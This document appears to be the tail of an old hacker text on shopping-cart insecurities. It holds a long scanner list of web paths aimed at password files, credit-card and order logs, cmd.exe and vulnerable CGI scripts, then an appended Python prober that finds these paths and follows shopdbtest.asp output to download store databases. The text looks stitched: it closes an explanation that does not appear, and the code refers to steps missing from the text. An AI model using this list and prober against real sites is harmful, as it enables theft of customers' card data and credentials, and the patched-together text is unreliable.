/PSUser/PSCOErrPage.htm /WebShop/logs/cc.txt /WebShop/logs/ck.log /WebShop/templates/cc.txt /_private /_vti_bin/_vti_aut/dvwssr.dll /_vti_bin/fpcount.exe /_vti_inf.html /_vti_pvt /_vti_pvt/administrators.pwd /_vti_pvt/authors.pwd /_vti_pvt/service.pwd /_vti_pvt/shtml.dll /_vti_pvt/shtml.exe /_vti_pvt/users.pwd /adsamples/config/site.csc /bin /carbo.dll /ccbill/secure/ccbill.log /cfdocs/cfmlsyntaxcheck.cfm /cfdocs/exampleapp/docs/sourcewindow.cfm /cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini /cfdocs/expelval/displayopenedfile.cfm /cfdocs/expelval/exprcalc.cfm /cfdocs/expelval/openfile.cfm /cfdocs/expelval/sendmail.cfm /cfdocs/snippets/fileexists.cfm /cfdocs/snippets/viewexample.cfm /cgi /cgi-bin /cgi-bin/AT-admin.cgi /cgi-bin/AT-generate.cgi /cgi-bin/Admin_files/order.log /cgi-bin/AnyForm2 /cgi-bin/Cgitest.exe /cgi-bin/Count.cgi /cgi-bin/FormHandler.cgi /cgi-bin/GW5/GWWEB.EXE /cgi-bin/UltraBoard.cgi /cgi-bin/UltraBoard.pl /cgi-bin/add_ftp.cgi /cgi-bin/adp /cgi-bin/adpassword.txt /cgi-bin/ads.setup /cgi-bin/aglimpse /cgi-bin/alibaba.pl /cgi-bin/allmanage.pl /cgi-bin/allmanage/adp /cgi-bin/allmanage/k /cgi-bin/allmanage/settings.cfg /cgi-bin/allmanage/userfile.dat /cgi-bin/allmanageup.pl /cgi-bin/anyboard.cgi /cgi-bin/architext_query.pl /cgi-bin/authorize/dbmfiles/users /cgi-bin/ax-admin.cgi /cgi-bin/ax.cgi /cgi-bin/bigconf.cgi all /cgi-bin/bizdb1-search.cgi /cgi-bin/bnbform.cgi /cgi-bin/cachemgr.cgi /cgi-bin/calender.pl /cgi-bin/calender_admin.pl /cgi-bin/campas /cgi-bin/cart.pl /cgi-bin/cgiwrap /cgi-bin/classifieds.cgi /cgi-bin/clickresponder.pl /cgi-bin/cmd.exe /cgi-bin/counterfiglet /cgi-bin/dbmlparser.exe /cgi-bin/dig.cgi /cgi-bin/dnewsweb /cgi-bin/edit.pl /cgi-bin/environ.cgi /cgi-bin/excite /cgi-bin/faxsurvey /cgi-bin/filemail.pl /cgi-bin/files.pl /cgi-bin/finger /cgi-bin/finger.pl /cgi-bin/formmail.pl /cgi-bin/fpcount.exe /cgi-bin/fpexplore.exe /cgi-bin/gH.cgi /cgi-bin/get32.exe /cgi-bin/glimpse /cgi-bin/guestbook.cgi /cgi-bin/handler 
/cgi-bin/htimage.exe /cgi-bin/htmlscript /cgi-bin/htsearch /cgi-bin/htsearch /cgi-bin/iisadmpwd/achg.htr /cgi-bin/iisadmpwd/aexp.htr /cgi-bin/iisadmpwd/aexp2.htr /cgi-bin/iisadmpwd/anot.htr /cgi-bin/imagemap.exe /cgi-bin/info2www /cgi-bin/infosrch.cgi /cgi-bin/input.bat /cgi-bin/input2.bat /cgi-bin/jj /cgi-bin/k /cgi-bin/loadpage.cgi /cgi-bin/mailform.exe /cgi-bin/maillist.pl /cgi-bin/makechanges/easysteps/easysteps.pl /cgi-bin/man.sh /cgi-bin/netstat /cgi-bin/nph-publish /cgi-bin/nph-test-cgi /cgi-bin/passwd /cgi-bin/passwd.txt /cgi-bin/perl.exe /cgi-bin/perlshop.cgi /cgi-bin/pfdispaly.cgi /cgi-bin/pfdisplay /cgi-bin/pfdisplay.cgi /cgi-bin/phf /cgi-bin/php.cgi /cgi-bin/plusmail /cgi-bin/postcard.pl /cgi-bin/printenv /cgi-bin/process_bug.cgi /cgi-bin/query /cgi-bin/responder /cgi-bin/rguest.exe /cgi-bin/rpm_query /cgi-bin/rwwwshell.pl /cgi-bin/search.cgi /cgi-bin/settings.cfg /cgi-bin/sojourn /cgi-bin/survey.cgi /cgi-bin/test-cgi /cgi-bin/test.bat /cgi-bin/textcounter.pl /cgi-bin/tpgnrock /cgi-bin/tst.bat /cgi-bin/tst.bat /cgi-bin/unlg1.1 /cgi-bin/unlg1.2 /cgi-bin/userfile.dat /cgi-bin/view-source /cgi-bin/visadmin.exe /cgi-bin/w3-msql/ /cgi-bin/webbbs.cgi /cgi-bin/webdist.cgi /cgi-bin/webplus /cgi-bin/websendmail /cgi-bin/webwho.pl /cgi-bin/wguest.exe /cgi-bin/whois_raw.cgi /cgi-bin/windmail.exe /cgi-bin/wrap /cgi-bin/www-sql /cgi-bin/wwwadmin.pl /cgi-bin/wwwboard.pl /cgi-dos/args.bat /cgi-dos/args.cmd /cgi-local /cgi-shl/win-c-sample.exe /cgi-src /cgi-src/phf.c /cgi-win /cgi-win/uploader.exe /cgibin /com1 /com2 /com3 /com4 /con/con /config/checks.txt /config/import.txt /config/mountain.cfg /config/orders.txt /default.asp. 
/default.asp::$DATA /doc /iisadmpwd/aexp2.htr /iishelp/iis/misc/iirturnh.htw /iissamples/exair/howitworks/codebrws.asp /iissamples/exair/search/advsearch.asp /iissamples/exair/search/qfullhit.htw /iissamples/exair/search/qsumrhit.htw /iissamples/iissamples/query.asp /iissamples/issamples/oop/qfullhit.htw /iissamples/issamples/oop/qsumrhit.htw /iissamples/sdk/asp/docs/codebrws.asp /log /logs /mall_log_files/order.log /manage/cgi/cgiproc /msadc/Samples/SELECTOR/showcode.asp /msadc/msadcs.dll /msads/Samples/SELECTOR/showcode.asp /ncl_items.html /order/order.log /orders/checks.txt /orders/import.txt /orders/mountain.cfg /orders/order.log /orders/orders.txt /ping all /ping?SomeCrapHere /piranha/secure/passwd.php3 /pw/storemgr.pw /quikstore.cfg /samples/search/queryhit.htm /scripts /scripts/CGImail.exe /scripts/c32web.exe/ChangeAdminPassword /scripts/cart32.exe/cart32clientlist /scripts/cmd.exe /scripts/convert.bas /scripts/counter.exe /scripts/dbman/db.cgi?db=invalid-db /scripts/emurl/RECMAN.dll /scripts/fpcount.exe /scripts/iisadmin/ism.dll?http/dir /scripts/issadmin/bdir.htr /scripts/no-such-file.pl /scripts/proxy/w3proxy.dll /scripts/slxweb.dll /scripts/tools/mkilog.exe /scripts/tools/newdsn.exe /scripts/uploadn.asp /scripts/wa.exe /scripts/webbbs.exe /scripts/wsisa.dll /search97.vts /server-status /showfile.asp /ssi/envout.bat /ws_ftp.ini /~ /~bin /~guest /~log /~logs /~lp /~named /~root /~test /~tmp
--

Most shopping carts are vulnerable in one way or another; it is just a matter of finding the way around them. If admins set the right permissions and think about what is reachable from the web, most of this goes away. Being smart is the key.

That concludes the explanation of shopping carts and their insecurities. Merry Christmas.
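The loadable list above is meant to be fed to a scanner; as an added example that is not part of the original text or of any of the scanners it names, here is a small Python auditor that loads a list in the same whitespace-separated form, probes each path through a pluggable fetch function, and treats a 200 as a hit only when its body differs from the server's answer to a path that cannot exist (old CGI scanners flooded you with false positives on sites that return a 200 welcome page for everything). When shopdbtest.asp answers, it derives the .mdb path from the xDatabase and xDblocation values exactly as the text does by hand and probes that too. The short PATH_LIST slice, the fake site and fake_fetch are constructed for the demo; in real use fetch would wrap urllib or requests against a host you are authorised to test.

```python
import re
from typing import Callable, Dict, List, Optional, Tuple

# A slice of the loadable list, in the same whitespace-separated form.
PATH_LIST = """
/shopdbtest.asp /cart/shopdbtest.asp /vpasp/shopdbtest.asp
/database/metacart.mdb /PDG_Cart/order.log /cgi-local/shop.pl/page=shop.cfg
/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log
"""

# fetch(path) -> (status, body). Real use wraps an HTTP client here.
Fetcher = Callable[[str], Tuple[int, str]]


def load_paths(text: str) -> List[str]:
    """Split on whitespace, keep tokens that look like request paths, and
    drop duplicates while preserving order (the list has many repeats)."""
    seen, out = set(), []
    for tok in text.split():
        if tok.startswith("/") and tok not in seen:
            seen.add(tok)
            out.append(tok)
    return out


def mdb_path_from_shopdbtest(body: str) -> Optional[str]:
    """Turn 'xDatabase: shopping' and 'xDblocation: \\shop_db' from a
    shopdbtest.asp page into the request path /shop_db/shopping.mdb."""
    db = re.search(r"xDatabase:\s*([\w.-]+)", body)
    loc = re.search(r"xDblocation:\s*([\w\\/.-]+)", body)
    if not (db and loc):
        return None
    folder = loc.group(1).replace("\\", "/").strip("/")
    name = db.group(1)
    if not name.lower().endswith(".mdb"):
        name += ".mdb"
    return "/%s/%s" % (folder, name) if folder else "/" + name


def audit(fetch: Fetcher, paths: List[str]) -> Dict[str, str]:
    """Probe every path. A hit is a 200 whose body differs from the baseline
    (the response to a path that cannot exist), which filters catch-all 200
    sites. A shopdbtest.asp hit is followed up by probing the derived .mdb."""
    _, baseline = fetch("/this-path-should-not-exist-" + "x" * 8)
    hits: Dict[str, str] = {}
    for p in paths:
        status, body = fetch(p)
        if status != 200 or body == baseline:
            continue
        hits[p] = body
        if p.lower().endswith("shopdbtest.asp"):
            mdb = mdb_path_from_shopdbtest(body)
            if mdb:
                s2, b2 = fetch(mdb)
                if s2 == 200 and b2 != baseline:
                    hits[mdb] = b2
    return hits


# Constructed fake server: answers 200 with a welcome page for every unknown
# path (the false-positive trap), and exposes the diagnostics page, the
# database it points at, and a PDG order log.
FAKE_SITE = {
    "/shopdbtest.asp": "xDatabase: shopping\nxDblocation: \\shop_db\n",
    "/shop_db/shopping.mdb": "Standard Jet DB\x00...",
    "/PDG_Cart/order.log": "card=4111111111111111 name=J. Doe\n",
}


def fake_fetch(path: str) -> Tuple[int, str]:
    return 200, FAKE_SITE.get(path, "<html>Welcome to our store!</html>")


if __name__ == "__main__":
    for path, body in audit(fake_fetch, load_paths(PATH_LIST)).items():
        print("HIT %-28s %d bytes" % (path, len(body)))
```

The baseline comparison is the part worth keeping when you write your own checks: without it, every entry in a list this size lights up on a server that serves its home page for unknown URLs, and the real exposures are lost in the noise.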